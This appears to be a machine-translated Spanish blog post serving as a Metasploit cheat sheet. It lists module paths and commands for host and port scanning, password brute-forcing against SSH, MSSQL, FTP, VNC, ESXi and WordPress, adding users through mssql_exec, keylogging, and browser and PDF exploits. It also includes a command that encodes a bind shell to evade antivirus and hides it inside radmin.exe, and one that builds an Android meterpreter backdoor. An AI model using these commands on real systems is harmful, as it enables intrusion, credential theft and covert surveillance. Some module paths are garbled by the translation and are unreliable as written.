Introducción a msf y sus módulos de uso común

módulo de funciones técnicas

exploits: la acción de usar las vulnerabilidades del sistema para atacar, este módulo corresponde al método de ataque de cada vulnerabilidad específica

Carga útil: después de una explotación exitosa, el código o la instrucción que realmente se ejecuta en el sistema de destino

auxiliar: Módulos auxiliares que realizan funciones como recopilación de información, enumeración, detección de huellas digitales y escaneo

codificadores: módulos que cifran la carga útil y evitan la inspección AV

nops: mejore la estabilidad de la carga útil y mantenga el tamaño

Genera una explicación de la opción común:
-b elimina los caracteres incorrectos, por ejemplo: -b '\x00\xff'
-e configura el método de codificación, puede usar el comando show encoders para ver todos los métodos de codificación
-f formato de salida, si no está configurado, el valor predeterminado es el lenguaje ruby. Por ejemplo, -fc o -f exe
-i establece el número de codificaciones, generalmente se usa para evitar la codificación múltiple
-k mantiene el comportamiento de la plantilla de origen e inyecta la carga útil en un proceso como un hilo, a menudo se usa junto con -x -o
nombre del archivo de salida
-x define un archivo como plantilla

usar carga útil/windows/shell_bind_tcp

generar -b '\x00\xff' -f exe -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -o 1.exe

comando meterpreter

fondo: volver pwd lpwd ls cat ejecutar: ejecutar programa getuid hashdump ps record_mic: grabar micrófono webcam_list: leer cámara

Módulo de escaneo de host: auxiliar/escáner/descubrimiento/arp_sweep

Módulo de escaneo de puertos: auxiliar/escáner/portscan/syn

Rastreo de contraseñas: use auxiliar/sniffer/psnuffle: admite la extracción de contraseñas de archivos de captura de pcap, actualmente solo admite los protocolos pop3, imap, ftp, http get.

Escaneo SNMP

usar auxiliar/escáner/snmp/snmp_login

usar auxiliar/escáner/snmp/snmp_enum

usar auxiliar/escáner/snmp/snmp_enumusers (ventanas)

usar auxiliar/escáner/snmp/snmp_enumshares (windows)aSASD//AS

Escaneo de versión SMB

usar auxiliar/escáner/smb/smb_version

Escanee la canalización con nombre para determinar el tipo de servicio SMB (contraseña de la cuenta)

usar auxiliar/escáner/smb/pipe_auditor

Busque servicios RCERPC accesibles a través de canalizaciones SMB

usar auxiliar/escáner/smb/pipe_dcerpc_auditor

Enumeración de recursos compartidos SMB (cuenta, contraseña)

usar auxiliar/escáner/smb/smb_enumshares

Enumeración de usuarios SMB (cuenta, contraseña)

usar auxiliar/escáner/smb/smb_enumusers

Enumeración SID (cuenta, contraseña)

usar auxiliar/escáner/smb/smb_lookupsid

Escaneo de versión SSH

usar auxiliar/escáner/ssh/ssh_version

Explosión de contraseñas SSH

usar auxiliar/escáner/ssh/ssh_login

Inicio de sesión de clave pública SSH

use auxiliar/escáner/ssh/ssh_login_pubkey

faltan parches para windows

use post/windows/gather/enum_patches

puerto de escaneo mssql

tcp1433 (puerto dinámico), udp1434 (número de puerto tcp de consulta)

usar auxiliar/escáner/mssql/mssql_ping

Explosión de contraseña mssql

usar auxiliar/escáner/mssql/mssql_login

ejecución remota de código

usar auxiliar/escáner/mssql/mssql_exec

establecer CMD usuario de red pase de usuario /ADD

escaneo de versión ftp

usar auxiliar/escáner/ftp/ftp_version

usar auxiliar/escáner/ftp/anónimo

usar auxiliar/escáner/ftp/ftp_login

Escaneo de vulnerabilidades

descifrado de contraseña vnc

usar auxiliar/escáner/vnc/vnc_login

acceso sin contraseña vnc

usar auxiliar/escáner/vnc/vnc_none_auth

Vulnerabilidad de escritorio remoto RDP

usar auxiliar/escáner/rdp/ms12_020_check

cheque no causa ataque dos

dispositivo de puerta trasera

usar auxiliar/escáner/ssh/juniper_backdoor

usar auxiliar/escáner/ssh/fortinet_backdoor

Explosión de contraseñas de VMware ESXI

use auxiliar/escáner/vmware/vmauthd_login

usar auxiliar/escáner/vmware/vmware_enum_vms

Uso de la API WEB

use auxiliar/admin/vmware/poweron_vm

escaneo de vulnerabilidad http

Certificados caducados: utilice auxiliar/escáner/http/cert

Mostrar directorios y archivos: utilice auxiliar/escáner/http/dir_listing

usar auxiliar/escáner/http/files_dir

omisión de identidad de codificación webdav unicode: utilice auxiliar/escáner/http/dir_webdav_unicode_bypass

Inicio de sesión de administración de Tomcat: utilice auxiliar/escáner/http/tomcat_mgr_login

Omisión de autenticación basada en el método http: utilice auxiliar/escáner/http/verb_auth_bypass

Explosión de contraseñas de WordPress: utilice auxiliar/escáner/http/wordpress_login_enum

establecer URI/wordpress/wp-login.php

Ejecutar carga útil utilizando la vulnerabilidad de Acrobat Reader

Construya archivos PDF: exploit/windows/fileformat/adobe_utilprintf

Construya un sitio web malicioso: exploit/windows/browser/adobe_utilprintf

Meterpreter

uso privado

ejecutar post/windows/capture/keylog_recorder

Ejecute la carga útil explotando la vulnerabilidad del complemento flash

use exploit/multi/navegador/adobe_flash_hacking_team_uaf

use exploit/multi/navegador/adobe_flash_opaque_background_uaf

usar auxiliar/servidor/navegador_autopwn2

Ejecutar carga útil utilizando la vulnerabilidad del navegador IE

use exploit/windows/browser/ms14_064_ole_code_execution (windowsxp)

Ejecutar carga útil usando vulnerabilidad JRE

use exploit/multi/navegador/java_jre17_driver_manager

use exploit/multi/navegador/java_jre17_jmxbean

use exploit/multi/browser/java_jre17_reflection_types

Generar programa de puerta trasera de Android

use la carga útil/android/meterpreter/reverse_tcp

generar -f a.apk -p android -t raw

Supongo que te gusta

Origin blog.csdn.net/bwt_D/article/details/123213077
Recomendado
Clasificación